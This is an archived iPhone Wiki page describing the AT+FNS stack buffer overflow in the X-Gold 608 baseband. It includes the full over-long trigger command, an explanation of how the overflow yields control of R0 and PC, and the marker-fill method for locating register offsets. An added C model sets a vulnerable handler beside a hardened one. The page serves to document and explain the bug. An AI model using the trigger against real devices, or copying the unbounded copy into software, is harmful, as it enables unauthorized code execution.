The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information.
Difference between revisions of "AT+FNS"
Revision diff (latest edit by ChronicDev, marked minor; 5 intermediate revisions by 4 users not shown).

Text removed from the earlier revision:

An exploit that NitroKey leaked. This exploit could have been used for a 3.1 Unlock.

Wait, is that last part confirmed? I thought that FNS was gone already...

The text added across these revisions is the current article, reproduced below.
Latest revision as of 21:00, 24 December 2012
Credit
Oranav
Exploit
There is a stack buffer overflow in the handler for the AT+FNS=0,"..." command, which allows unsigned code execution on the X-Gold 608 baseband. The string argument is copied into a fixed-size buffer on the stack without a length check, so an over-long argument runs past the buffer into the saved registers of the routine's frame. The trigger is the following command (note that, as written here, it omits the leading 0, argument given in the command form above; the page does not say whether both forms reach the vulnerable copy):
AT+FNS="0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111112222333344445555666677"
The overflow overwrites the saved R0 and R2 slots on the stack, and R2 is copied to PC on exit from the routine, so the attacker controls both R0 and PC. The 1111...2222...77 tail is the usual distinct-marker fill: the value that turns up in each register after the crash tells you which offset in the string reached that slot, which is how the positions of R0 and R2 in the argument are found.
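The following is an added example, not code from this wiki page or from the X-Gold 608 firmware. It models the bug class described above in C: an AT command handler copies the quoted argument of AT+FNS into a fixed-size stack buffer with no length check, so the copy runs over the saved-register slots that the epilogue pops into R0 and R2; a hardened handler that rejects over-long arguments is shown beside it, together with the marker-fill technique for mapping a clobbered register value back to its offset in the argument. The buffer size (64), the frame layout (`struct frame_model`), the marker scheme and all function names are assumptions chosen for illustration.

```c
/* Added example (not from the wiki page or the baseband firmware). Models the
 * AT+FNS bug class: unbounded copy of the quoted argument into a stack buffer
 * that is followed by the saved R0/R2 slots. Sizes and layout are assumptions. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARG_BUF_SIZE 64u   /* assumed size of the handler's local buffer */

/* Assumed stack-frame layout: the local buffer, then the two saved-register slots. */
struct frame_model {
    char arg[ARG_BUF_SIZE];
    uint32_t saved_r0;
    uint32_t saved_r2;   /* per the page, this value is copied to PC on return */
};

/* Locate the quoted string argument in a command line such as AT+FNS="...". */
static bool fns_quoted_arg(const char *cmd, const char **start, size_t *len)
{
    const char *open = strchr(cmd, '"');
    if (!open) return false;
    const char *close = strchr(open + 1, '"');
    if (!close) return false;
    *start = open + 1;
    *len = (size_t)(close - open - 1);
    return true;
}

/* Vulnerable handler: unbounded copy. Writing through an unsigned char view of the
 * frame image keeps the demo free of undefined behaviour while showing exactly
 * which slots an over-long argument reaches. Real firmware has no 'sizeof *f' stop. */
static void handle_fns_vulnerable(const char *cmd, struct frame_model *f)
{
    const char *s; size_t n;
    if (!fns_quoted_arg(cmd, &s, &n)) return;
    unsigned char *dst = (unsigned char *)f;          /* arg[] sits at offset 0 */
    for (size_t i = 0; i < n && i < sizeof *f; i++)
        dst[i] = (unsigned char)s[i];
}

/* Hardened handler: reject anything that does not fit together with its NUL. */
static bool handle_fns_fixed(const char *cmd, struct frame_model *f)
{
    const char *s; size_t n;
    if (!fns_quoted_arg(cmd, &s, &n)) return false;
    if (n >= sizeof f->arg) return false;              /* would overflow: answer ERROR */
    memcpy(f->arg, s, n);
    f->arg[n] = '\0';
    return true;
}

/* Probe builder: 'filler' zeros followed by 4-byte marker groups "1111","2222",...
 * Each group is four identical bytes, so a register holding it reads the same on
 * either endianness. Returns 0 if 'out' is too small or too many groups requested. */
static size_t build_fns_probe(size_t filler, unsigned groups, char *out, size_t cap)
{
    const char *head = "AT+FNS=\"";
    size_t need = strlen(head) + filler + 4u * groups + 2u;  /* closing quote + NUL */
    if (groups > 9 || need > cap) return 0;
    char *p = out;
    memcpy(p, head, strlen(head)); p += strlen(head);
    memset(p, '0', filler);        p += filler;
    for (unsigned g = 0; g < groups; g++) { memset(p, '1' + (int)g, 4); p += 4; }
    *p++ = '"';
    *p = '\0';
    return (size_t)(p - out);
}

/* Map a register value seen after the crash back to the byte offset inside the
 * argument that landed in it; -1 if the value is not one of our markers. */
static int marker_offset(uint32_t reg, size_t filler)
{
    uint8_t b = (uint8_t)(reg & 0xffu);
    if (b < '1' || b > '9') return -1;
    if (reg != 0x01010101u * b) return -1;    /* all four bytes must match */
    return (int)(filler + 4u * (size_t)(b - '1'));
}

struct probe_result {
    bool fixed_accepted;    /* did the hardened handler take the argument? */
    uint32_t r0, r2;        /* what the vulnerable handler left in the saved slots */
    int r2_offset;          /* where in the argument the future PC value sits */
};

/* Run one probe against both handlers, each on a zeroed frame image. */
static struct probe_result run_probe(size_t filler, unsigned groups)
{
    struct probe_result r = { false, 0, 0, -1 };
    char cmd[512];
    if (!build_fns_probe(filler, groups, cmd, sizeof cmd)) return r;

    struct frame_model fixed; memset(&fixed, 0, sizeof fixed);
    r.fixed_accepted = handle_fns_fixed(cmd, &fixed);

    struct frame_model vuln; memset(&vuln, 0, sizeof vuln);
    handle_fns_vulnerable(cmd, &vuln);
    r.r0 = vuln.saved_r0;
    r.r2 = vuln.saved_r2;
    r.r2_offset = marker_offset(r.r2, filler);
    return r;
}

int main(void)
{
    struct probe_result r = run_probe(ARG_BUF_SIZE, 4);   /* exactly fills arg[], markers spill */
    printf("hardened handler accepted over-long argument: %s\n", r.fixed_accepted ? "yes" : "no");
    printf("saved R0 = 0x%08x, saved R2 = 0x%08x (argument offset %d)\n", r.r0, r.r2, r.r2_offset);
    printf("hardened handler accepted short argument: %s\n", run_probe(8, 1).fixed_accepted ? "yes" : "no");
    return 0;
}
```

With a 64-byte filler the first marker group lands in saved R0 and the second in saved R2, so the crash state would show R2 = 0x32323232 and `marker_offset` reports offset 68; that is the position in the argument where an attacker would place the address to be loaded into PC. The hardened handler never reaches the copy for that input and answers with an error instead.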
Description
Yet another buffer overflow in an AT command handler, in the same class as AT+XLOG and AT+stkprof. It was leaked by NitroKey, who somehow intercepted the information and posted it to Pastie, with hashes, shortly after Oranav had disclosed it to the iPhone Dev Team.